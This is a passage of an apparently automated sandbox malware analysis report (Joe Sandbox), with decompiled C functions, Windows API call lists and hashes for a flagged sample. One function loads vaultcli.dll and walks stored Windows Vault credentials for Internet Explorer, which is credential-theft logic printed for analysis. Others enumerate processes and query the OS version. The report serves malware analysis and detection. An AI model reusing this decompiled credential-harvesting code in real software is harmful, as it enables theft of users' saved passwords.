                                                                    					E02D11F76(0x2e5db5c);
                                                                    					 *0x2e5d0e8 = 1;
                                                                    					_t13 = E02D11F4B(0x2e5db54, E02D195AA, 0x2e5d0e8);
                                                                    				} else {
                                                                    					_t13 = E02D11F4B(0x2e5db5c, E02D1882F, 0x2e5d0e8);
                                                                    					 *0x2e5dafc = 1;
                                                                    				}
                                                                    				LeaveCriticalSection(0x2e5db10);
                                                                    				return _t13;
                                                                    			}







                                                                    APIs
                                                                    • InitializeCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19916
                                                                    • DeleteCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D1992D
                                                                    • EnterCriticalSection.KERNEL32(02E5DB10,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19939
                                                                    • GetModuleHandleA.KERNEL32(00000000,?,00000000,?,?,?,?,02D12E0D,?,00000001,?,?), ref: 02D19949
                                                                    • LeaveCriticalSection.KERNEL32(02E5DB10,?,00000000), ref: 02D1999C
                                                                      • Part of subcall function 02D11F4B: CreateThread.KERNEL32 ref: 02D11F60
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$CreateDeleteEnterHandleInitializeLeaveModuleThread
                                                                    • String ID:
                                                                    • API String ID: 2964645253-0
                                                                    • Opcode ID: 676b962001afe72a4f9bcafff28cb4788d11336152e451bdc12ecb315db3ae51
                                                                    • Instruction ID: 7ce1e7e32d70eca0f7858a73d6eaeef782258374041a2a8de159e88ae333e8c9
                                                                    • Opcode Fuzzy Hash: 676b962001afe72a4f9bcafff28cb4788d11336152e451bdc12ecb315db3ae51
                                                                    • Instruction Fuzzy Hash: BE01F931D90224BBDB10AF61BC69ACB3F6EEB61310F418405F905A7741D7708859CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 93%
                                                                    			E02D20C79(signed int* __ecx, void* __edx) {
                                                                    				char _v524;
                                                                    				intOrPtr _v552;
                                                                    				void* _v560;
                                                                    				int _t9;
                                                                    				void* _t15;
                                                                    				void* _t19;
                                                                    				signed int* _t20;
                                                                    
                                                                    				_t15 = __edx;
                                                                    				_v560 = 0x22c;
                                                                    				_t20 = __ecx;
                                                                    				_t19 = CreateToolhelp32Snapshot(2, 0);
                                                                    				if(_t19 == 0xffffffff) {
                                                                    					L6:
                                                                    					 *_t20 =  *_t20 & 0x00000000;
                                                                    				} else {
                                                                    					_push( &_v560);
                                                                    					_t9 = Process32FirstW(_t19);
                                                                    					while(_t9 != 0) {
                                                                    						if(_v552 == _t15) {
                                                                    							CloseHandle(_t19);
                                                                    							E02D135E5(_t20,  &_v524);
                                                                    						} else {
                                                                    							_t9 = Process32NextW(_t19,  &_v560);
                                                                    							continue;
                                                                    						}
                                                                    						goto L7;
                                                                    					}
                                                                    					CloseHandle(_t19);
                                                                    					goto L6;
                                                                    				}
                                                                    				L7:
                                                                    				return _t20;
                                                                    			}











                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02D20C97
                                                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 02D20CAC
                                                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 02D20CC4
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D20CCF
                                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 02D20CE0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 1789362936-0
                                                                    • Opcode ID: 7459c6dc51b5d8d7b84d99d0394ab3f1a7df639db7a0c45827a994a5bcd7aa31
                                                                    • Instruction ID: 7e9179fb695b00f5f8a8f0e25ed6227b23b186692faad6c88a64cdb8a2104a2d
                                                                    • Opcode Fuzzy Hash: 7459c6dc51b5d8d7b84d99d0394ab3f1a7df639db7a0c45827a994a5bcd7aa31
                                                                    • Instruction Fuzzy Hash: F501D171A01224BBD7306BB6AC4CB7E7BBCEB7472AF1054A5E905A2380E7708C5DDB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _free.LIBCMT ref: 0041135B
                                                                      • Part of subcall function 0040DD40: HeapFree.KERNEL32(00000000,00000000,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?), ref: 0040DD56
                                                                      • Part of subcall function 0040DD40: GetLastError.KERNEL32(?,?,004113D6,?,00000000,?,00000000,?,004113FD,?,00000007,?,?,00411801,?,?), ref: 0040DD68
                                                                    • _free.LIBCMT ref: 0041136D
                                                                    • _free.LIBCMT ref: 0041137F
                                                                    • _free.LIBCMT ref: 00411391
                                                                    • _free.LIBCMT ref: 004113A3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.262019469.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.262012326.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.262241777.0000000000422000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264261048.000000000054A000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264342206.0000000000551000.00000040.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264365462.0000000000553000.00000080.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.264379372.0000000000554000.00000004.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                    • String ID:
                                                                    • API String ID: 776569668-0
                                                                    • Opcode ID: 4b08d2cbb008381b0177714e4ef0e11a8813bdafe5eb6ff5743f56f4855835e1
                                                                    • Instruction ID: 520a62c1e8cd01b15c9c59d5e9cde0741d0704f92e5b2d9a1c9edf2e912cbc48
                                                                    • Opcode Fuzzy Hash: 4b08d2cbb008381b0177714e4ef0e11a8813bdafe5eb6ff5743f56f4855835e1
                                                                    • Instruction Fuzzy Hash: 5EF06836904608A7E610DBAAF481CAF73D9AF41314754080BF558EBA54C738FCC45A5C
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1B627(void* __ecx) {
                                                                    				int _t15;
                                                                    				void* _t18;
                                                                    
                                                                    				_t18 = __ecx;
                                                                    				FreeLibrary( *(__ecx + 0xb4));
                                                                    				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                                                    				FreeLibrary( *(_t18 + 0xa8));
                                                                    				 *(_t18 + 0xa8) = 0;
                                                                    				FreeLibrary( *(_t18 + 0xac));
                                                                    				 *(_t18 + 0xac) = 0;
                                                                    				FreeLibrary( *(_t18 + 0xb8));
                                                                    				 *(_t18 + 0xb8) = 0;
                                                                    				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                                                    				 *(_t18 + 0xb0) = 0;
                                                                    				return _t15;
                                                                    			}


                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B638
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B648
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B656
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B664
                                                                    • FreeLibrary.KERNEL32(?,?,?,00000000,02D1ABDF), ref: 02D1B672
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction ID: d075cbc725422d11a1db5b8c6d0d7323a9f687750ee7d2b7de76ce24bdbe80e8
                                                                    • Opcode Fuzzy Hash: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction Fuzzy Hash: E7F0A571B00B26BED7595F758C84B86FF6AFF49260F01462B952C42221CB716434DFD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 100%
                                                                    			E02D1B9A9(void* __ecx) {
                                                                    				int _t15;
                                                                    				void* _t18;
                                                                    
                                                                    				_t18 = __ecx;
                                                                    				FreeLibrary( *(__ecx + 0xb4));
                                                                    				 *((intOrPtr*)(_t18 + 0xb4)) = 0;
                                                                    				FreeLibrary( *(_t18 + 0xa8));
                                                                    				 *(_t18 + 0xa8) = 0;
                                                                    				FreeLibrary( *(_t18 + 0xac));
                                                                    				 *(_t18 + 0xac) = 0;
                                                                    				FreeLibrary( *(_t18 + 0xb8));
                                                                    				 *(_t18 + 0xb8) = 0;
                                                                    				_t15 = FreeLibrary( *(_t18 + 0xb0));
                                                                    				 *(_t18 + 0xb0) = 0;
                                                                    				return _t15;
                                                                    			}


                                                                    APIs
                                                                    • FreeLibrary.KERNEL32(?,00000001,?,00000000,02D1B132), ref: 02D1B9BA
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9CA
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9D8
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9E6
                                                                    • FreeLibrary.KERNEL32(?,?,00000000,02D1B132), ref: 02D1B9F4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrary
                                                                    • String ID:
                                                                    • API String ID: 3664257935-0
                                                                    • Opcode ID: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction ID: d075cbc725422d11a1db5b8c6d0d7323a9f687750ee7d2b7de76ce24bdbe80e8
                                                                    • Opcode Fuzzy Hash: a122d1116d5b6a9a51343cc2093216993d8b2da3eb161c6faee29fb59606df76
                                                                    • Instruction Fuzzy Hash: E7F0A571B00B26BED7595F758C84B86FF6AFF49260F01462B952C42221CB716434DFD2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 61%
                                                                    			E02D1B203(void* __ecx, void* __edx, void* __eflags) {
                                                                    				char _v8;
                                                                    				char _v12;
                                                                    				char _v16;
                                                                    				char _v20;
                                                                    				char _v24;
                                                                    				intOrPtr _v28;
                                                                    				char _v32;
                                                                    				char _v36;
                                                                    				char _v40;
                                                                    				char _v44;
                                                                    				char _v48;
                                                                    				char _v52;
                                                                    				char _v56;
                                                                    				char _v60;
                                                                    				char _v64;
                                                                    				char _v68;
                                                                    				char _v72;
                                                                    				char _v76;
                                                                    				char _v80;
                                                                    				char _v84;
                                                                    				char _v92;
                                                                    				char _v96;
                                                                    				char _v100;
                                                                    				void* _t124;
                                                                    				void* _t127;
                                                                    				intOrPtr _t129;
                                                                    				void* _t133;
                                                                    				intOrPtr _t147;
                                                                    				void* _t148;
                                                                    				void* _t159;
                                                                    				void* _t162;
                                                                    				void* _t186;
                                                                    				char _t226;
                                                                    				intOrPtr _t229;
                                                                    				char _t234;
                                                                    				void* _t235;
                                                                    
                                                                    				_t234 = 0;
                                                                    				_t186 = __ecx;
                                                                    				_t226 = 0;
                                                                    				_v16 = 0;
                                                                    				_v44 = 0;
                                                                    				_v20 = 0;
                                                                    				_v12 = 0;
                                                                    				_v8 = 0;
                                                                    				_v84 = 0;
                                                                    				if(E02D1B559(__ecx) != 0) {
                                                                    					_push( &_v16);
                                                                    					_push(0);
                                                                    					_push(0x2d29140);
                                                                    					if( *((intOrPtr*)(__ecx + 0x8c))() == 0) {
                                                                    						_push( &_v20);
                                                                    						_push( &_v44);
                                                                    						_push(0x200);
                                                                    						_push(_v16);
                                                                    						if( *((intOrPtr*)(__ecx + 0x94))() == 0) {
                                                                    							_t240 = _v44;
                                                                    							if(_v44 != 0) {
                                                                    								_v80 = 0;
                                                                    								_v40 = 0;
                                                                    								_v36 = 0;
                                                                    								do {
                                                                    									_t124 = E02D1B526(_t240);
                                                                    									_push(0x10);
                                                                    									_push(0x2d29130);
                                                                    									if(_t124 == 0) {
                                                                    										_push(_t226);
                                                                    										_v28 = _v20 + _v40;
                                                                    										_t127 = E02D11000();
                                                                    										_t235 = _t235 + 0xc;
                                                                    										__eflags = _t127;
                                                                    										if(__eflags == 0) {
                                                                    											E02D135E5( &_v32,  *((intOrPtr*)(_v28 + 0x10)));
                                                                    											_t133 = E02D13248( &_v32, E02D135E5( &_v64, L"Internet Explorer"));
                                                                    											E02D15EA5(_v64);
                                                                    											_v64 = _t234;
                                                                    											__eflags = _t133;
                                                                    											if(__eflags != 0) {
                                                                    												asm("movaps xmm0, [0x2d27580]");
                                                                    												asm("movups [ebp-0x60], xmm0");
                                                                    												E02D13437( &_v100, E02D135E5( &_v68,  *((intOrPtr*)(_v8 + 0x14)) + 0x20));
                                                                    												E02D15EA5(_v68);
                                                                    												_v68 = _t234;
                                                                    												E02D13437( &_v96, E02D135E5( &_v72,  *((intOrPtr*)(_v8 + 0x18)) + 0x20));
                                                                    												E02D15EA5(_v72);
                                                                    												_v12 = _t234;
                                                                    												_t147 = _v28;
                                                                    												_v72 = _t234;
                                                                    												_t148 =  *((intOrPtr*)(_t186 + 0x98))(_v16, _t147,  *((intOrPtr*)(_t147 + 0x14)),  *((intOrPtr*)(_t147 + 0x18)), _t234, _t234, _t234,  &_v12);
                                                                    												__eflags = _t148;
                                                                    												if(_t148 == 0) {
                                                                    													_v8 = _v12;
                                                                    													__eflags =  *((intOrPtr*)(_v28 + 0x1c)) + 0x20;
                                                                    													E02D13437( &_v84, E02D135E5( &_v76,  *((intOrPtr*)(_v28 + 0x1c)) + 0x20));
                                                                    													E02D15EA5(_v76);
                                                                    													_v76 = _t234;
                                                                    												}
                                                                    												_t235 = _t235 - 0x10;
                                                                    												E02D11F95(_t235,  &_v100);
                                                                    												E02D11FCB(_t186);
                                                                    												E02D113EF( &_v100);
                                                                    											}
                                                                    											E02D15EA5(_v32);
                                                                    											_v32 = _t234;
                                                                    											goto L18;
                                                                    										}
                                                                    									} else {
                                                                    										_t226 = _v36 + _v20;
                                                                    										_push(_t226);
                                                                    										_v8 = _t226;
                                                                    										_t159 = E02D11000();
                                                                    										_t235 = _t235 + 0xc;
                                                                    										if(_t159 == 0) {
                                                                    											E02D135E5( &_v24,  *((intOrPtr*)(_t226 + 0x10)));
                                                                    											_t162 = E02D13248( &_v24, E02D135E5( &_v48, L"Internet Explorer"));
                                                                    											E02D15EA5(_v48);
                                                                    											_v48 = _t234;
                                                                    											if(_t162 != 0) {
                                                                    												_t229 = _v8;
                                                                    												asm("movaps xmm0, [0x2d27580]");
                                                                    												asm("movups [ebp-0x60], xmm0");
                                                                    												E02D13437( &_v100, E02D135E5( &_v52,  *((intOrPtr*)(_t229 + 0x14)) + 0x20));
                                                                    												E02D15EA5(_v52);
                                                                    												_v52 = _t234;
                                                                    												E02D13437( &_v96, E02D135E5( &_v56,  *((intOrPtr*)(_t229 + 0x18)) + 0x20));
                                                                    												E02D15EA5(_v56);
                                                                    												_v12 = _t234;
                                                                    												_push( &_v12);
                                                                    												_push(_t234);
                                                                    												_push(_t234);
                                                                    												_push(_t234);
                                                                    												_push( *((intOrPtr*)(_t229 + 0x18)));
                                                                    												_v56 = _t234;
                                                                    												_push( *((intOrPtr*)(_t229 + 0x14)));
                                                                    												_push(_t229);
                                                                    												_push(_v16);
                                                                    												if( *((intOrPtr*)(_t186 + 0x98))() == 0) {
                                                                    													_v8 = _v12;
                                                                    													E02D13437( &_v92, E02D135E5( &_v60,  *((intOrPtr*)(_v12 + 0x1c)) + 0x20));
                                                                    													E02D15EA5(_v60);
                                                                    													_v60 = _t234;
                                                                    												}
                                                                    												_t235 = _t235 - 0x10;
                                                                    												E02D11F95(_t235,  &_v100);
                                                                    												E02D11FCB(_t186);
                                                                    												E02D113EF( &_v100);
                                                                    											}
                                                                    											E02D15EA5(_v24);
                                                                    											_v24 = _t234;
                                                                    											L18:
                                                                    											_t226 = _v8;
                                                                    										}
                                                                    									}
                                                                    									_v36 = _v36 + 0x38;
                                                                    									_t129 = _v80 + 1;
                                                                    									_v40 = _v40 + 0x34;
                                                                    									_v80 = _t129;
                                                                    								} while (_t129 < _v44);
                                                                    								_t234 = _v84;
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				if(_v20 != 0) {
                                                                    					 *((intOrPtr*)(_t186 + 0xa0))(_v20);
                                                                    				}
                                                                    				if(_v16 != 0) {
                                                                    					 *((intOrPtr*)(_t186 + 0x90))( &_v16);
                                                                    				}
                                                                    				FreeLibrary( *(_t186 + 0xc0));
                                                                    				E02D15EA5(_t234);
                                                                    				E02D15EA5(0);
                                                                    				return E02D15EA5(0);
                                                                    			}

                                                                    APIs
                                                                      • Part of subcall function 02D1B559: LoadLibraryA.KERNEL32(vaultcli.dll,00000000,02D1B229), ref: 02D1B561
                                                                    • FreeLibrary.KERNEL32(?), ref: 02D1B506
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,00000000,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D135EE
                                                                      • Part of subcall function 02D135E5: lstrlenW.KERNEL32(02D21E02,?,02D21E02,00000000,00000000,.bss,00000000), ref: 02D13605
                                                                      • Part of subcall function 02D135E5: lstrcpyW.KERNEL32 ref: 02D13620
                                                                      • Part of subcall function 02D13248: lstrcmpW.KERNEL32(?,?), ref: 02D13252
                                                                      • Part of subcall function 02D15EA5: VirtualFree.KERNELBASE(?,00000000,00008000,02D15C2A,00000000,?,02D210EE,?,?,02D236DB), ref: 02D15EAD
                                                                      • Part of subcall function 02D13437: lstrcpyW.KERNEL32 ref: 02D1345C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
                                                                    • Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
                                                                    • Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FreeLibrarylstrcpylstrlen$LoadVirtuallstrcmp
                                                                    • String ID: 4$8$Internet Explorer
                                                                    • API String ID: 708496175-747916358
                                                                    • Opcode ID: 4dad11411b094b13948d7601b256004e1ebe91a451d454d425aebb05b5584fd3
                                                                    • Instruction ID: cb6c99a13bda6138cfabf84a8468a3c6241ec9de2a276c5ca3b27178ac325fd7
                                                                    • Opcode Fuzzy Hash: 4dad11411b094b13948d7601b256004e1ebe91a451d454d425aebb05b5584fd3
                                                                    • Instruction Fuzzy Hash: F5A12771D00219ABDF15EFA5E885AEEBB7AFF54708F10406AE405A7750EB30AE45CF60
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E02D1FA42() {
                                                                    				intOrPtr _v6;
                                                                    				signed int _v12;
                                                                    				intOrPtr _v272;
                                                                    				intOrPtr _v280;
                                                                    				intOrPtr _v284;
                                                                    				char _v288;
                                                                    				struct HINSTANCE__* _t33;
                                                                    				intOrPtr _t35;
                                                                    				intOrPtr _t38;
                                                                    				intOrPtr _t53;
                                                                    				intOrPtr _t62;
                                                                    				_Unknown_base(*)()* _t69;
                                                                    				void* _t71;
                                                                    
                                                                    				_v288 = 0x11c;
                                                                    				_t33 = LoadLibraryA("ntdll.dll");
                                                                    				if(_t33 == 0) {
                                                                    					L3:
                                                                    					_t71 = 2;
                                                                    					if(_v272 != _t71) {
                                                                    						goto L43;
                                                                    					} else {
                                                                    						_t35 = _v6;
                                                                    						if(_t35 != 1) {
                                                                    							if(_t35 == 2 || _t35 == 3) {
                                                                    								if(_v284 != 5) {
                                                                    									if(_v284 != 6) {
                                                                    										if(_v284 != 0xa || _v280 != 0) {
                                                                    											goto L43;
                                                                    										} else {
                                                                    											return (_v12 & 0x0000ffff) + 0x2710;
                                                                    										}
                                                                    									} else {
                                                                    										_t38 = _v280;
                                                                    										if(_t38 != 0) {
                                                                    											if(_t38 != 1) {
                                                                    												if(_t38 != _t71) {
                                                                    													if(_t38 != 3) {
                                                                    														goto L43;
                                                                    													} else {
                                                                    														return (_v12 & 0x0000ffff) + 0x189c;
                                                                    													}
                                                                    												} else {
                                                                    													return (_v12 & 0x0000ffff) + 0x1838;
                                                                    												}
                                                                    											} else {
                                                                    												return (_v12 & 0x0000ffff) + 0x17d4;
                                                                    											}
                                                                    										} else {
                                                                    											return (_v12 & 0x0000ffff) + 0x1770;
                                                                    										}
                                                                    									}
                                                                    								} else {
                                                                    									if(_v280 != 1) {
                                                                    										if(_v280 != _t71) {
                                                                    											goto L43;
                                                                    										} else {
                                                                    											return (_v12 & 0x0000ffff) + 0x1450;
                                                                    										}
                                                                    									} else {
                                                                    										return (_v12 & 0x0000ffff) + 0x13ec;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								goto L43;
                                                                    							}
                                                                    						} else {
                                                                    							if(_v284 != 5) {
                                                                    								if(_v284 != 6) {
                                                                    									if(_v284 != 0xa || _v280 != 0) {
                                                                    										goto L43;
                                                                    									} else {
                                                                    										return (_v12 & 0x0000ffff) + 0x3e8;
                                                                    									}
                                                                    								} else {
                                                                    									_t53 = _v280;
                                                                    									if(_t53 != 0) {
                                                                    										if(_t53 != 1) {
                                                                    											if(_t53 != _t71) {
                                                                    												if(_t53 != 3) {
                                                                    													goto L43;
                                                                    												} else {
                                                                    													return (_v12 & 0x0000ffff) + 0x276;
                                                                    												}
                                                                    											} else {
                                                                    												return (_v12 & 0x0000ffff) + 0x26c;
                                                                    											}
                                                                    										} else {
                                                                    											return (_v12 & 0x0000ffff) + 0x262;
                                                                    										}
                                                                    									} else {
                                                                    										return (_v12 & 0x0000ffff) + 0x258;
                                                                    									}
                                                                    								}
                                                                    							} else {
                                                                    								_t62 = _v280;
                                                                    								if(_t62 != 0) {
                                                                    									if(_t62 != 1) {
                                                                    										if(_t62 != _t71) {
                                                                    											goto L43;
                                                                    										} else {
                                                                    											return (_v12 & 0x0000ffff) + 0x208;
                                                                    										}
                                                                    									} else {
                                                                    										return (_v12 & 0x0000ffff) + 0x1fe;
                                                                    									}
                                                                    								} else {
                                                                    									return (_v12 & 0x0000ffff) + 0x1f4;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				} else {
                                                                    					_t69 = GetProcAddress(_t33, "RtlGetVersion");
                                                                    					if(_t69 == 0) {
                                                                    						L43:
                                                                    						return 0;
                                                                    					} else {
                                                                    						 *_t69( &_v288);
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    			}
                                                                    0x02d1fb70
                                                                    0x02d1fb7a
                                                                    0x02d1fb7a
                                                                    0x02d1fb6e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x02d1fa9b
                                                                    0x02d1faa2
                                                                    0x02d1fae3
                                                                    0x02d1fb34
                                                                    0x00000000
                                                                    0x02d1fb47
                                                                    0x02d1fb51
                                                                    0x02d1fb51
                                                                    0x02d1fae5
                                                                    0x02d1fae5
                                                                    0x02d1faed
                                                                    0x02d1fafd
                                                                    0x02d1fb0c
                                                                    0x02d1fb1c
                                                                    0x00000000
                                                                    0x02d1fb22
                                                                    0x02d1fb2c
                                                                    0x02d1fb2c
                                                                    0x02d1fb0e
                                                                    0x02d1fb18
                                                                    0x02d1fb18
                                                                    0x02d1faff
                                                                    0x02d1fb09
                                                                    0x02d1fb09
                                                                    0x02d1faef
                                                                    0x02d1faf9
                                                                    0x02d1faf9
                                                                    0x02d1faed
                                                                    0x02d1faa4
                                                                    0x02d1faa4
                                                                    0x02d1faac
                                                                    0x02d1fabc
                                                                    0x02d1facb
                                                                    0x00000000
                                                                    0x02d1fad1
                                                                    0x02d1fadb
                                                                    0x02d1fadb
                                                                    0x02d1fabe
                                                                    0x02d1fac8
                                                                    0x02d1fac8
                                                                    0x02d1faae
                                                                    0x02d1fab8
                                                                    0x02d1fab8
                                                                    0x02d1faac
                                                                    0x02d1faa2
                                                                    0x02d1fa95
                                                                    0x02d1fa64
                                                                    0x02d1fa6a
                                                                    0x02d1fa72
                                                                    0x02d1fbf8
                                                                    0x02d1fbfb
                                                                    0x02d1fa78
                                                                    0x02d1fa7f
                                                                    0x00000000
                                                                    0x02d1fa7f
                                                                    0x02d1fa72

                                                                    APIs
                                                                    • LoadLibraryA.KERNEL32(ntdll.dll), ref: 02D1FA5A
                                                                    • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 02D1FA6A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.265787896.0000000002D11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: true
• Associated: 00000000.00000002.265777345.0000000002D10000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265818960.0000000002D24000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265836002.0000000002D29000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.265991289.0000000002E5D000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.266002119.0000000002E5F000.00000002.00001000.00020000.00000000.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_2d10000_SecuriteInfo.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: AddressLibraryLoadProc
                                                                    • String ID: RtlGetVersion$ntdll.dll
                                                                    • API String ID: 2574300362-1489217083
                                                                    • Opcode ID: e20f0910a7123fcbfae48f8a427405ed3f7ff98b362518257ba180e182a4ae88
                                                                    • Instruction ID: 73672dc641c1d2134bd62f63ecd4c5ba7e6759d8a73f7d22cd5114598629711d
